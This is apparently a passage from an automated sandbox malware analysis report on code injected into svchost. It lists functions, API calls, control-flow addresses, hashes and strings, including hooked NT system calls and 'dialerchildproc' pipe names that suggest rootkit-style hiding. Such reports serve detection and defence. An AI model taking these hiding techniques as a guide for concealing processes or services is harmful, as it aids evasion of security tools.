                                                                          • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction ID: 18f95a425c74309a6456fd4bbe7ec78cd519c13267e7c4c7f8ddd63764443e45
                                                                          • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction Fuzzy Hash: 8E512676244F85C6EB54CF62E5483BAB7E1F789BD9F048134DA4A07B68EF38C1498B00
                                                                          Function 000001F28C931D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread$AddressHandleModuleProc
                                                                          • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                          • API String ID: 4175298099-1975688563
                                                                          • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction ID: 9487c6cd3bd73dd193c882a9535ab93ec09423b9485fe8c9d985bb2c2d5cc9fb
                                                                          • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction Fuzzy Hash: A3318F79280ECBA1EA05EBB5EC616F463A4F7043C4F88A0F3E85953576AF388259C350
                                                                          Function 000001F28C1D6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 232 1f28c1d6910-1f28c1d6916 233 1f28c1d6951-1f28c1d695b 232->233 234 1f28c1d6918-1f28c1d691b 232->234 235 1f28c1d6a78-1f28c1d6a8d 233->235 236 1f28c1d691d-1f28c1d6920 234->236 237 1f28c1d6945-1f28c1d6984 call 1f28c1d6fc0 234->237 241 1f28c1d6a8f 235->241 242 1f28c1d6a9c-1f28c1d6ab6 call 1f28c1d6e54 235->242 239 1f28c1d6938 __scrt_dllmain_crt_thread_attach 236->239 240 1f28c1d6922-1f28c1d6925 236->240 255 1f28c1d698a-1f28c1d699f call 1f28c1d6e54 237->255 256 1f28c1d6a52 237->256 244 1f28c1d693d-1f28c1d6944 239->244 246 1f28c1d6931-1f28c1d6936 call 1f28c1d6f04 240->246 247 1f28c1d6927-1f28c1d6930 240->247 248 1f28c1d6a91-1f28c1d6a9b 241->248 253 1f28c1d6aef-1f28c1d6b20 call 1f28c1d7190 242->253 254 1f28c1d6ab8-1f28c1d6aed call 1f28c1d6f7c call 1f28c1d6e1c call 1f28c1d7318 call 1f28c1d7130 call 1f28c1d7154 call 1f28c1d6fac 242->254 246->244 264 1f28c1d6b31-1f28c1d6b37 253->264 265 1f28c1d6b22-1f28c1d6b28 253->265 254->248 267 1f28c1d6a6a-1f28c1d6a77 call 1f28c1d7190 255->267 268 1f28c1d69a5-1f28c1d69b6 call 1f28c1d6ec4 255->268 259 1f28c1d6a54-1f28c1d6a69 256->259 270 1f28c1d6b7e-1f28c1d6b94 call 1f28c1d268c 264->270 271 1f28c1d6b39-1f28c1d6b43 264->271 265->264 269 1f28c1d6b2a-1f28c1d6b2c 265->269 267->235 285 1f28c1d6a07-1f28c1d6a11 call 1f28c1d7130 268->285 286 1f28c1d69b8-1f28c1d69dc call 1f28c1d72dc call 1f28c1d6e0c call 1f28c1d6e38 call 1f28c1dac0c 268->286 275 1f28c1d6c1f-1f28c1d6c2c 269->275 288 1f28c1d6bcc-1f28c1d6bce 270->288 289 1f28c1d6b96-1f28c1d6b98 270->289 276 1f28c1d6b4f-1f28c1d6b5d call 1f28c1e5780 271->276 277 1f28c1d6b45-1f28c1d6b4d 271->277 282 1f28c1d6b63-1f28c1d6b78 call 1f28c1d6910 276->282 299 1f28c1d6c15-1f28c1d6c1d 276->299 277->282 282->270 282->299 285->256 308 1f28c1d6a13-1f28c1d6a1f call 1f28c1d7180 285->308 286->285 335 1f28c1d69de-1f28c1d69e5 __scrt_dllmain_after_initialize_c 286->335 297 1f28c1d6bd0-1f28c1d6bd3 288->297 298 1f28c1d6bd5-1f28c1d6bea call 1f28c1d6910 288->298 289->288 296 1f28c1d6b9a-1f28c1d6bbc call 1f28c1d268c call 1f28c1d6a78 289->296 296->288 329 1f28c1d6bbe-1f28c1d6bc6 call 1f28c1e5780 296->329 297->298 297->299 298->299 317 1f28c1d6bec-1f28c1d6bf6 298->317 299->275 319 1f28c1d6a21-1f28c1d6a2b call 1f28c1d7098 308->319 320 1f28c1d6a45-1f28c1d6a50 308->320 323 1f28c1d6c01-1f28c1d6c11 call 1f28c1e5780 317->323 324 1f28c1d6bf8-1f28c1d6bff 317->324 319->320 334 1f28c1d6a2d-1f28c1d6a3b 319->334 320->259 323->299 324->299 329->288 334->320 335->285 336 1f28c1d69e7-1f28c1d6a04 call 1f28c1dabc8 335->336 336->285
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3294067605.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c1d0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                          • API String ID: 190073905-1786718095
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: 3ae14674ec2a8346f3f84ed9e0c01df585913646f7da2965e941060b61735599
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: F581F0717C0E038AFA54DB66A4C03F96ED0AB85BC0F448935FB498379ADB38E8458700
                                                                          Function 000001F28C93CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetLastError.KERNEL32 ref: 000001F28C93CE37
                                                                          • FlsGetValue.KERNEL32(?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CE4C
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CE6D
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CE9A
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CEAB
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CEBC
                                                                          • SetLastError.KERNEL32 ref: 000001F28C93CED7
                                                                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CF0D
                                                                          • FlsSetValue.KERNEL32(?,?,00000001,000001F28C93ECCC,?,?,?,?,000001F28C93BF9F,?,?,?,?,?,000001F28C937AB0), ref: 000001F28C93CF2C
                                                                            • Part of subcall function 000001F28C93D6CC: HeapAlloc.KERNEL32 ref: 000001F28C93D721
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CF54
                                                                            • Part of subcall function 000001F28C93D744: HeapFree.KERNEL32 ref: 000001F28C93D75A
                                                                            • Part of subcall function 000001F28C93D744: GetLastError.KERNEL32 ref: 000001F28C93D764
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CF65
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CF76
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast$Heap$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 570795689-0
                                                                          • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction ID: c1dccc9a58c3acbe364e99b3de5aaac7dedc88dfaa24f6078136831367b18d4b
                                                                          • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction Fuzzy Hash: 274149713C1EC782FA68A73159553FA22C25B84BF4F2C27B4E836076E6EF3998018200
                                                                          Function 000001F28C932244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                          • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                          • API String ID: 2171963597-1373409510
                                                                          • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction ID: 57cb264d3990d0bdc8e496bdce57bc45f54469c11ba177c15f029bb998e39be8
                                                                          • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction Fuzzy Hash: BE213876658E82C2EB209B25F4443BA67E0F789BE5F544265EA5907AA8DF3CC149CB00
                                                                          Function 000001F28C93A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 611 1f28c93a544-1f28c93a5ac call 1f28c93b414 614 1f28c93aa13-1f28c93aa1b call 1f28c93c748 611->614 615 1f28c93a5b2-1f28c93a5b5 611->615 615->614 616 1f28c93a5bb-1f28c93a5c1 615->616 618 1f28c93a5c7-1f28c93a5cb 616->618 619 1f28c93a690-1f28c93a6a2 616->619 618->619 623 1f28c93a5d1-1f28c93a5dc 618->623 621 1f28c93a963-1f28c93a967 619->621 622 1f28c93a6a8-1f28c93a6ac 619->622 626 1f28c93a969-1f28c93a970 621->626 627 1f28c93a9a0-1f28c93a9aa call 1f28c939634 621->627 622->621 624 1f28c93a6b2-1f28c93a6bd 622->624 623->619 625 1f28c93a5e2-1f28c93a5e7 623->625 624->621 630 1f28c93a6c3-1f28c93a6ca 624->630 625->619 631 1f28c93a5ed-1f28c93a5f7 call 1f28c939634 625->631 626->614 628 1f28c93a976-1f28c93a99b call 1f28c93aa1c 626->628 627->614 637 1f28c93a9ac-1f28c93a9cb call 1f28c937940 627->637 628->627 634 1f28c93a894-1f28c93a8a0 630->634 635 1f28c93a6d0-1f28c93a707 call 1f28c939a10 630->635 631->637 645 1f28c93a5fd-1f28c93a628 call 1f28c939634 * 2 call 1f28c939d24 631->645 634->627 638 1f28c93a8a6-1f28c93a8aa 634->638 635->634 649 1f28c93a70d-1f28c93a715 635->649 642 1f28c93a8ac-1f28c93a8b8 call 1f28c939ce4 638->642 643 1f28c93a8ba-1f28c93a8c2 638->643 642->643 658 1f28c93a8db-1f28c93a8e3 642->658 643->627 648 1f28c93a8c8-1f28c93a8d5 call 1f28c9398b4 643->648 679 1f28c93a648-1f28c93a652 call 1f28c939634 645->679 680 1f28c93a62a-1f28c93a62e 645->680 648->627 648->658 654 1f28c93a719-1f28c93a74b 649->654 655 1f28c93a887-1f28c93a88e 654->655 656 1f28c93a751-1f28c93a75c 654->656 655->634 655->654 656->655 660 1f28c93a762-1f28c93a77b 656->660 661 1f28c93a8e9-1f28c93a8ed 658->661 662 1f28c93a9f6-1f28c93aa12 call 1f28c939634 * 2 call 1f28c93c6a8 658->662 664 1f28c93a874-1f28c93a879 660->664 665 1f28c93a781-1f28c93a7c6 call 1f28c939cf8 * 2 660->665 666 1f28c93a900 661->666 667 1f28c93a8ef-1f28c93a8fe call 1f28c939ce4 661->667 662->614 670 1f28c93a884 664->670 692 1f28c93a804-1f28c93a80a 665->692 693 1f28c93a7c8-1f28c93a7ee call 1f28c939cf8 call 1f28c93ac38 665->693 675 1f28c93a903-1f28c93a90d call 1f28c93b4ac 666->675 667->675 670->655 675->627 690 1f28c93a913-1f28c93a961 call 1f28c939944 call 1f28c939b50 675->690 679->619 696 1f28c93a654-1f28c93a674 call 1f28c939634 * 2 call 1f28c93b4ac 679->696 680->679 684 1f28c93a630-1f28c93a63b 680->684 684->679 689 1f28c93a63d-1f28c93a642 684->689 689->614 689->679 690->627 700 1f28c93a80c-1f28c93a810 692->700 701 1f28c93a87b 692->701 712 1f28c93a815-1f28c93a872 call 1f28c93a470 693->712 713 1f28c93a7f0-1f28c93a802 693->713 717 1f28c93a676-1f28c93a680 call 1f28c93b59c 696->717 718 1f28c93a68b 696->718 700->665 702 1f28c93a880 701->702 702->670 712->702 713->692 713->693 721 1f28c93a686-1f28c93a9ef call 1f28c9392ac call 1f28c93aff4 call 1f28c9394a0 717->721 722 1f28c93a9f0-1f28c93a9f5 call 1f28c93c6a8 717->722 718->619 721->722 722->662
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                          • Instruction ID: e40025dd339e04ccce31ab42e6e43acdbfcb282d0efd4a44ebad16c513d6860d
                                                                          • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                          • Instruction Fuzzy Hash: 51E17A72640B828AEB209BB598803FD77E0F755BE8F196166EE8957B99CF34C481C701
                                                                          Function 000001F28C1D9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 490 1f28c1d9944-1f28c1d99ac call 1f28c1da814 493 1f28c1d9e13-1f28c1d9e1b call 1f28c1dbb48 490->493 494 1f28c1d99b2-1f28c1d99b5 490->494 494->493 495 1f28c1d99bb-1f28c1d99c1 494->495 497 1f28c1d9a90-1f28c1d9aa2 495->497 498 1f28c1d99c7-1f28c1d99cb 495->498 500 1f28c1d9aa8-1f28c1d9aac 497->500 501 1f28c1d9d63-1f28c1d9d67 497->501 498->497 502 1f28c1d99d1-1f28c1d99dc 498->502 500->501 505 1f28c1d9ab2-1f28c1d9abd 500->505 503 1f28c1d9da0-1f28c1d9daa call 1f28c1d8a34 501->503 504 1f28c1d9d69-1f28c1d9d70 501->504 502->497 506 1f28c1d99e2-1f28c1d99e7 502->506 503->493 516 1f28c1d9dac-1f28c1d9dcb call 1f28c1d6d40 503->516 504->493 507 1f28c1d9d76-1f28c1d9d9b call 1f28c1d9e1c 504->507 505->501 509 1f28c1d9ac3-1f28c1d9aca 505->509 506->497 510 1f28c1d99ed-1f28c1d99f7 call 1f28c1d8a34 506->510 507->503 513 1f28c1d9ad0-1f28c1d9b07 call 1f28c1d8e10 509->513 514 1f28c1d9c94-1f28c1d9ca0 509->514 510->516 524 1f28c1d99fd-1f28c1d9a28 call 1f28c1d8a34 * 2 call 1f28c1d9124 510->524 513->514 529 1f28c1d9b0d-1f28c1d9b15 513->529 514->503 517 1f28c1d9ca6-1f28c1d9caa 514->517 521 1f28c1d9cba-1f28c1d9cc2 517->521 522 1f28c1d9cac-1f28c1d9cb8 call 1f28c1d90e4 517->522 521->503 528 1f28c1d9cc8-1f28c1d9cd5 call 1f28c1d8cb4 521->528 522->521 538 1f28c1d9cdb-1f28c1d9ce3 522->538 558 1f28c1d9a2a-1f28c1d9a2e 524->558 559 1f28c1d9a48-1f28c1d9a52 call 1f28c1d8a34 524->559 528->503 528->538 530 1f28c1d9b19-1f28c1d9b4b 529->530 535 1f28c1d9b51-1f28c1d9b5c 530->535 536 1f28c1d9c87-1f28c1d9c8e 530->536 535->536 539 1f28c1d9b62-1f28c1d9b7b 535->539 536->514 536->530 540 1f28c1d9df6-1f28c1d9e12 call 1f28c1d8a34 * 2 call 1f28c1dbaa8 538->540 541 1f28c1d9ce9-1f28c1d9ced 538->541 543 1f28c1d9b81-1f28c1d9bc6 call 1f28c1d90f8 * 2 539->543 544 1f28c1d9c74-1f28c1d9c79 539->544 540->493 545 1f28c1d9cef-1f28c1d9cfe call 1f28c1d90e4 541->545 546 1f28c1d9d00 541->546 571 1f28c1d9bc8-1f28c1d9bee call 1f28c1d90f8 call 1f28c1da038 543->571 572 1f28c1d9c04-1f28c1d9c0a 543->572 550 1f28c1d9c84 544->550 554 1f28c1d9d03-1f28c1d9d0d call 1f28c1da8ac 545->554 546->554 550->536 554->503 569 1f28c1d9d13-1f28c1d9d61 call 1f28c1d8d44 call 1f28c1d8f50 554->569 558->559 563 1f28c1d9a30-1f28c1d9a3b 558->563 559->497 575 1f28c1d9a54-1f28c1d9a74 call 1f28c1d8a34 * 2 call 1f28c1da8ac 559->575 563->559 568 1f28c1d9a3d-1f28c1d9a42 563->568 568->493 568->559 569->503 591 1f28c1d9bf0-1f28c1d9c02 571->591 592 1f28c1d9c15-1f28c1d9c72 call 1f28c1d9870 571->592 579 1f28c1d9c7b 572->579 580 1f28c1d9c0c-1f28c1d9c10 572->580 596 1f28c1d9a8b 575->596 597 1f28c1d9a76-1f28c1d9a80 call 1f28c1da99c 575->597 581 1f28c1d9c80 579->581 580->543 581->550 591->571 591->572 592->581 596->497 600 1f28c1d9df0-1f28c1d9df5 call 1f28c1dbaa8 597->600 601 1f28c1d9a86-1f28c1d9def call 1f28c1d86ac call 1f28c1da3f4 call 1f28c1d88a0 597->601 600->540 601->600
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3294067605.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c1d0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction ID: a9609446f00a766f3d3b655ef47b5d2ff7605ba4997714f758606ca2dc9d6f4c
                                                                          • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction Fuzzy Hash: 38E15672644F828AEB609F65E4803ED7BE0F755BD8F104125EB8957B9ACF38E491C740
                                                                          Function 000001F28C93F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeLibraryProc
                                                                          • String ID: api-ms-$ext-ms-
                                                                          • API String ID: 3013587201-537541572
                                                                          • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                          • Instruction ID: 13c93742e32ee18173703abb3e1a129c63d5b1ec7d71d03a5c5f3c659c718adc
                                                                          • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                          • Instruction Fuzzy Hash: 1E41AF72391E82D1EB16CB76A9087F623D1FB49BE0F0962B9DD0A87785EF39C4458314
                                                                          Function 000001F28C93104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                          • String ID: d
                                                                          • API String ID: 3743429067-2564639436
                                                                          • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                          • Instruction ID: e61549d0980b68c844d3942048ca76a1816c2b656e0948ec105a341f4de0e688
                                                                          • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                          • Instruction Fuzzy Hash: 2D412A72254FC5CAE760CF61E4447EA77E1F389B99F448129DA8907B58EF38C589CB40
                                                                          Function 000001F28C93D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FlsGetValue.KERNEL32(?,?,?,000001F28C93C7DE,?,?,?,?,?,?,?,?,000001F28C93CF9D,?,?,00000001), ref: 000001F28C93D087
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001F28C93C7DE,?,?,?,?,?,?,?,?,000001F28C93CF9D,?,?,00000001), ref: 000001F28C93D0A6
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001F28C93C7DE,?,?,?,?,?,?,?,?,000001F28C93CF9D,?,?,00000001), ref: 000001F28C93D0CE
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001F28C93C7DE,?,?,?,?,?,?,?,?,000001F28C93CF9D,?,?,00000001), ref: 000001F28C93D0DF
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001F28C93C7DE,?,?,?,?,?,?,?,?,000001F28C93CF9D,?,?,00000001), ref: 000001F28C93D0F0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Value
                                                                          • String ID: 1%$Y%
                                                                          • API String ID: 3702945584-1395475152
                                                                          • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                          • Instruction ID: 5dc8ff007fbd2db76a624d83063225198278ec11a387f4125d1c2f12366c8b68
                                                                          • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                          • Instruction Fuzzy Hash: D2119332794EC782FA68973565613FA62C95B44BF4F1C63F4E839076EADF38C4028200
                                                                          Function 000001F28C937510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID:
                                                                          • API String ID: 190073905-0
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: 9b580adf4509b41eb4a94773ff5a8102b7ce542dff54e5b26089740a9ad9f4c5
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: ED81F771780EC386FB54AB35AA513F922D1AB85BCCF1CA4F5E90987796EB38C845C710
                                                                          Function 000001F28C939DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                          • String ID: api-ms-
                                                                          • API String ID: 2559590344-2084034818
                                                                          • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                          • Instruction ID: 03f29b56315fbdb1e2c5d3331ac812390df4fb0cbb8384e9f5da931591f2930e
                                                                          • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                          • Instruction Fuzzy Hash: 9D31A232292E82E1EE219B62A4007F523D4B748BE0F5E6675DD2E0B7D0EF39C5858310
                                                                          Function 000001F28C943DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                          • String ID: CONOUT$
                                                                          • API String ID: 3230265001-3130406586
                                                                          • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                          • Instruction ID: 67fdd3f2f8992466b5831d267c2879e71773b428b435bf4b694825e767cf1671
                                                                          • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                          • Instruction Fuzzy Hash: 69115B71250E82C6E7508B52E8547B966E0F788FE5F448264EA5E87794DB38C9148740
                                                                          Function 000001F28C933790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                          • String ID: wr
                                                                          • API String ID: 1092925422-2678910430
                                                                          • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                          • Instruction ID: 9fd3b5cfc8d5e8966b9d3604d7804b60c4d561f4ad314e44b91f313a0dd5a99b
                                                                          • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                          • Instruction Fuzzy Hash: BB112A7A745B82C2EB149B22E4082B962A0F748BD5F4841B9DE8D07B54EF3DC545C704
                                                                          Function 000001F28C935B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
